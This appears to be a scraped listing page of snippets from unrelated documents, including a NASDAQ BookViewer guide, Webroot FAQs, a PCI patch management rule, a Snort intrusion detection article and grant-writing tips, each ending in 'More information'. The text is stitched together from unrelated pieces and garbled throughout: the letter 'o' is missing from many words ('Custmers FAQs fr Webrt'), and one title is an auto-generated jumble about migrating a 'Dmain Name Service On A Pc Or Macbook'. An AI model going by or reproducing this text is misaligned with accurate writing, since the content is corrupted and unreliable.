NASDAQ BookViewer 2.0 User Guide NASDAQ BkViewer 2.0 User Guide NASDAQ BkViewer 2.0 ffers a real-time view f the rder depth using the NASDAQ Ttalview prduct fr NASDAQ and ther exchange-listed securities including: The tp buy and sell

More information

Customers FAQs for Webroot SecureAnywhere Identity Shield

Customers FAQs for Webroot SecureAnywhere Identity Shield Custmers FAQs fr Webrt SecureAnywhere Identity Shield Table f Cntents General Questins...2 Why is the bank ffering Webrt SecureAnywhere sftware?... 2 What des it prtect?... 2 Wh is Webrt?... 2 Is Webrt

More information

990 e-postcard FAQ. Is there a charge to file form 990-N (e-postcard)? No, the e-postcard system is completely free.

990 e-postcard FAQ. Is there a charge to file form 990-N (e-postcard)? No, the e-postcard system is completely free. 990 e-pstcard FAQ Fr frequently asked questins abut filing the e-pstcard that are nt listed belw, brwse the FAQ at http://epstcard.frm990.rg/frmtsfaq.asp# (cpy and paste this link t yur brwser). General

More information

Getting Started Guide

Getting Started Guide AnswerDash Resurces http://answerdash.cm Cntextual help fr sales and supprt Getting Started Guide AnswerDash is cmmitted t helping yu achieve yur larger business gals. The utlined pre-launch cnsideratins

More information

FAQs for Webroot SecureAnywhere Identity Shield

FAQs for Webroot SecureAnywhere Identity Shield FAQs fr Webrt SecureAnywhere Identity Shield Table f Cntents General Questins...2 Why is the bank ffering Webrt SecureAnywhere Identity Shield?... 2 What des it prtect?... 2 Wh is Webrt?... 2 Is the Webrt

More information

Software Update Notification

Software Update Notification Sftware Update Ntificatin PSS0223-02 Mastersizer 3000 v1.01 sftware Abstract This dcument details the release f sftware PSS0223-02 v1.01 f the sftware fr the Mastersizer 3000 laser diffractin system. It

More information

Version: Modified By: Date: Approved By: Date: 1.0 Michael Hawkins October 29, 2013 Dan Bowden November 2013

Version: Modified By: Date: Approved By: Date: 1.0 Michael Hawkins October 29, 2013 Dan Bowden November 2013 Versin: Mdified By: Date: Apprved By: Date: 1.0 Michael Hawkins Octber 29, 2013 Dan Bwden Nvember 2013 Rule 4-004J Payment Card Industry (PCI) Patch Management (prpsed) 01.1 Purpse The purpse f the Patch

More information

X7500 Series, X4500 Scanner Series MFPs: LDAP Address Book and Authentication Configuration and Basic Troubleshooting Tips

X7500 Series, X4500 Scanner Series MFPs: LDAP Address Book and Authentication Configuration and Basic Troubleshooting Tips X7500 Series, X4500 Scanner Series MFPs: LDAP Address Bk and Authenticatin Cnfiguratin and Basic Trubleshting Tips Lexmark Internatinal 1 Prerequisite Infrm atin In rder t cnfigure a Lexmark MFP fr LDAP

More information

Software and Hardware Change Management Policy for CDes Computer Labs

Software and Hardware Change Management Policy for CDes Computer Labs Sftware and Hardware Change Management Plicy fr CDes Cmputer Labs Overview The cmputer labs in the Cllege f Design are clsely integrated with the academic needs f faculty and students. Cmputer lab resurces

More information

Blue Link Solutions Terminal Server Configuration How to Install Blue Link Solutions in a Terminal Server Environment

Blue Link Solutions Terminal Server Configuration How to Install Blue Link Solutions in a Terminal Server Environment Blue Link Slutins Terminal Server Cnfiguratin Hw t Install Blue Link Slutins in a Terminal Server Envirnment Prepared by: Darren Myher April 9, 2002 Table f Cntents Backgrund... 2 Applicatin Server mde

More information

Diagnosis and Troubleshooting

Diagnosis and Troubleshooting Diagnsis and Trubleshting DataDirect Cnnect Series ODBC Drivers Intrductin This paper discusses the diagnstic tls that are available t cnfigure and trublesht yur ODBC envirnment and prvides a trubleshting

More information

UNIVERSITY OF CALIFORNIA MERCED PERFORMANCE MANAGEMENT GUIDELINES

UNIVERSITY OF CALIFORNIA MERCED PERFORMANCE MANAGEMENT GUIDELINES UNIVERSITY OF CALIFORNIA MERCED PERFORMANCE MANAGEMENT GUIDELINES REFERENCES AND RELATED POLICIES A. UC PPSM 2 -Definitin f Terms B. UC PPSM 12 -Nndiscriminatin in Emplyment C. UC PPSM 14 -Affirmative

More information

Introduction LIVE MAPS UNITY PORTAL / INSTALLATION GUIDE. 2015 Savision B.V. savision.com All rights reserved.

Introduction LIVE MAPS UNITY PORTAL / INSTALLATION GUIDE. 2015 Savision B.V. savision.com All rights reserved. Rev 7.5.0 Intrductin 2 LIVE MAPS UNITY PORTAL / INSTALLATION GUIDE 2015 Savisin B.V. savisin.cm All rights reserved. This manual, as well as the sftware described in it, is furnished under license and

More information

Grant Application Writing Tips and Tricks

Grant Application Writing Tips and Tricks Grant Applicatin Writing Tips and Tricks Grants are prvided by gvernment (lcal, state and natinal), charitable trusts, and by cmmunity rganisatins (eg Ltteries, Rtary, etc). Each grant has a specific purpse,

More information

ACTIVITY MONITOR Real Time Monitor Employee Activity Monitor

ACTIVITY MONITOR Real Time Monitor Employee Activity Monitor ACTIVITY MONITOR Real Time Mnitr Emplyee Activity Mnitr This pwerful tl allws yu t track any LAN, giving yu the mst detailed infrmatin n what, hw and when yur netwrk users perfrmed. Whether it is a library

More information

Wireless Light-Level Monitoring

Wireless Light-Level Monitoring Wireless Light-Level Mnitring ILT1000 ILT1000 Applicatin Nte Wireless Light-Level Mnitring 1 Wireless Light-Level Mnitring ILT1000 The affrdability, accessibility, and ease f use f wireless technlgy cmbined

More information

The Allstate Foundation Domestic Violence Program 2015 Moving Ahead Financial Empowerment Grant

The Allstate Foundation Domestic Violence Program 2015 Moving Ahead Financial Empowerment Grant The Allstate Fundatin Dmestic Vilence Prgram 2015 Mving Ahead Financial Empwerment Grant Due Date: September 1, 2015 Online applicatin: https://www.grantrequest.cm/sid_1010?sa=sna&fid=35296 The Allstate

More information

Avatier Identity Management Suite

Avatier Identity Management Suite Avatier Identity Management Suite AIMS Versin 9 System Requirements Versin 9 2603 Camin Ramn Suite 110 San Ramn, CA 94583 Phne: 800-609-8610 925-217-5170 FAX: 925-217-0853 Email: [email protected] Page

More information

In addition to assisting with the disaster planning process, it is hoped this document will also::

In addition to assisting with the disaster planning process, it is hoped this document will also:: First Step f a Disaster Recver Analysis: Knwing What Yu Have and Hw t Get t it Ntes abut using this dcument: This free tl is ffered as a guide and starting pint. It is des nt cver all pssible business

More information

Implementing SQL Manage Quick Guide

Implementing SQL Manage Quick Guide Implementing SQL Manage Quick Guide The purpse f this dcument is t guide yu thrugh the quick prcess f implementing SQL Manage n SQL Server databases. SQL Manage is a ttal management slutin fr Micrsft SQL

More information

Telelink 6. Installation Manual

Telelink 6. Installation Manual Telelink 6 Installatin Manual Table f cntents 1. SYSTEM REQUIREMENTS... 3 1.1. Hardware Requirements... 3 1.2. Sftware Requirements... 3 1.2.1. Platfrm... 3 1.2.1.1. Supprted Operating Systems... 3 1.2.1.2.

More information

Network Intrusion Detection

Network Intrusion Detection Netwrk Intrusin Detectin Best f Breed Prtectin with SNORT Implementing Snrt Snrt can be readily implemented with the help f a special Linux distributin named Sentinix (http://www.sentinix.rg). Wait a minute,

More information

Ensuring end-to-end protection of video integrity

Ensuring end-to-end protection of video integrity White paper Ensuring end-t-end prtectin f vide integrity Prepared by: Jhn Rasmussen, Senir Technical Prduct Manager, Crprate Business Unit, Milestne Systems Date: May 22, 2015 Milestne Systems Ensuring

More information

Licensing Windows Server 2012 R2 for use with virtualization technologies

Licensing Windows Server 2012 R2 for use with virtualization technologies Vlume Licensing brief Licensing Windws Server 2012 R2 fr use with virtualizatin technlgies (VMware ESX/ESXi, Micrsft System Center 2012 R2 Virtual Machine Manager, and Parallels Virtuzz) Table f Cntents

More information

esupport Quick Start Guide

esupport Quick Start Guide esupprt Quick Start Guide Last Updated: 5/11/10 Adirndack Slutins, Inc. Helping Yu Reach Yur Peak 908.725.8869 www.adirndackslutins.cm 1 Table f Cntents PURPOSE & INTRODUCTION... 3 HOW TO LOGIN... 3 SUBMITTING

More information

Getting started with Android

Getting started with Android Getting started with Andrid Befre we begin, there is a prerequisite, which is t plug the Andrid device int yur cmputer, and lad the drivers fr the OS. In writing this article, I was using Windws XP, 7

More information

HP ExpertOne. HP2-T21: Administering HP Server Solutions. Table of Contents

HP ExpertOne. HP2-T21: Administering HP Server Solutions. Table of Contents HP ExpertOne HP2-T21: Administering HP Server Slutins Industry Standard Servers Exam preparatin guide Table f Cntents Overview 2 Why take the exam? 2 HP ATP Server Administratr V8 certificatin 2 Wh shuld

More information

User Guide Version 3.9

User Guide Version 3.9 User Guide Versin 3.9 Page 2 f 22 Summary Cntents 1 INTRODUCTION... 3 1.1 2 CREATE A NEW ACCOUNT... 4 2.1 2.2 3 NAVIGATION... 3 CREATE AN EMAIL ACCOUNT... 4 CREATE AN ALIAS ACCOUNT... 6 MODIFYING AN EXISTING

More information

Junos Pulse Instructions for Windows and Mac OS X

Junos Pulse Instructions for Windows and Mac OS X Juns Pulse Instructins fr Windws and Mac OS X When yu pen the Juns client fr the first time yu get the fllwing screen. This screen shws yu have n cnnectins. Create a new cnnectin by clicking n the + icn.

More information

GUIDANCE FOR BUSINESS ASSOCIATES

GUIDANCE FOR BUSINESS ASSOCIATES GUIDANCE FOR BUSINESS ASSOCIATES This Guidance fr Business Assciates dcument is intended t verview UPMCs expectatins, as well as t prvide additinal resurces and infrmatin, t UPMC s HIPAA business assciates.

More information

Email Setup PPD IT How-to Guides June 2010

Email Setup PPD IT How-to Guides June 2010 Email Setup Cntents Email Infrmatin... 2 IMAP and POP3 settings... 2 Cnfiguring Micrsft Outlk 2007... 2 Archiving mail... 3 Cnfiguring AutArchive in Micrsft Outlk 2007... 3 Access frm ff site... 4 Cnfiguring

More information

Webalo Pro Appliance Setup

Webalo Pro Appliance Setup Webal Pr Appliance Setup 1. Dwnlad the Webal virtual appliance apprpriate fr yur virtualizatin infrastructure, using the link yu were emailed. The virtual appliance is delivered as a.zip file that is n

More information

The Importance Advanced Data Collection System Maintenance. Berry Drijsen Global Service Business Manager. knowledge to shape your future

The Importance Advanced Data Collection System Maintenance. Berry Drijsen Global Service Business Manager. knowledge to shape your future The Imprtance Advanced Data Cllectin System Maintenance Berry Drijsen Glbal Service Business Manager WHITE PAPER knwledge t shape yur future The Imprtance Advanced Data Cllectin System Maintenance Cntents

More information

Software Distribution

Software Distribution Sftware Distributin Quantrax has autmated many f the prcesses invlved in distributing new cde t clients. This will greatly reduce the time taken t get fixes laded nt clients systems. The new prcedures

More information

CSC IT practix Recommendations

CSC IT practix Recommendations CSC IT practix Recmmendatins CSC Healthcare 28th January 2014 Versin 3 www.csc.cm/glbalhealthcare Cntents 1 Imprtant infrmatin 3 2 IT Specificatins 4 2.1 Wrkstatins... 4 2.2 Minimum Server with 1-5 wrkstatins

More information

Best Practice - Pentaho BA for High Availability

Best Practice - Pentaho BA for High Availability Best Practice - Pentah BA fr High Availability This page intentinally left blank. Cntents Overview... 1 Pentah Server High Availability Intrductin... 2 Prerequisites... 3 Pint Each Server t Same Database

More information

Getting Started Guide

Getting Started Guide fr SQL Server www.lgbinder.cm Getting Started Guide Dcument versin 1 Cntents Installing LOGbinder fr SQL Server... 3 Step 1 Select Server and Check Requirements... 3 Select Server... 3 Sftware Requirements...

More information

E-Biz Web Hosting Control Panel

E-Biz Web Hosting Control Panel 1 f 38 E-Biz Web Hsting Cntrl Panel This dcument has been created t give yu a useful insight in t the Hsting Cntrl Panel available with E-Biz hsting services. Please nte: Optins available are dependent

More information

Using Sentry-go Enterprise/ASPX for Sentry-go Quick & Plus! monitors

Using Sentry-go Enterprise/ASPX for Sentry-go Quick & Plus! monitors Using Sentry-g Enterprise/ASPX fr Sentry-g Quick & Plus! mnitrs 3Ds (UK) Limited, February, 2014 http://www.sentry-g.cm Be Practive, Nt Reactive! Intrductin Sentry-g Enterprise Reprting is a self-cntained

More information

AMWA Chapter Subgroups on LinkedIn Guidance for Subgroup Managers and Chapter Leaders, updated 2-12-15

AMWA Chapter Subgroups on LinkedIn Guidance for Subgroup Managers and Chapter Leaders, updated 2-12-15 AMWA Chapter Subgrups n LinkedIn Guidance fr Subgrup Managers and Chapter Leaders, updated 2-12-15 1. Chapters may nt have an independent grup n LinkedIn, Facebk, r ther scial netwrking site. AMWA prvides

More information

BRILL s Editorial Manager (EM) Manual for Authors Table of Contents

BRILL s Editorial Manager (EM) Manual for Authors Table of Contents BRILL s Editrial Manager (EM) Manual fr Authrs Table f Cntents Intrductin... 2 1. Getting Started: Creating an Accunt... 2 2. Lgging int EM... 3 3. Changing Yur Access Cdes and Cntact Infrmatin... 3 3.1

More information

How To Migrate To A Networks Dmain Name Service On A Pc Or Macbook (For Pc) On A Linux Computer (For Macbook) On An Ipad Or Ipad (For Ipad) On Pc Or Ipa (For

How To Migrate To A Networks Dmain Name Service On A Pc Or Macbook (For Pc) On A Linux Computer (For Macbook) On An Ipad Or Ipad (For Ipad) On Pc Or Ipa (For Reprt: April 12, 2011 By Erick Engelke I have rganized my tasks arund tw majr prblems: 1. Define the new active directry a. Dmain Name Service fr the dmain - cmplete b. Dmain layut, structuring f Organizatinal

More information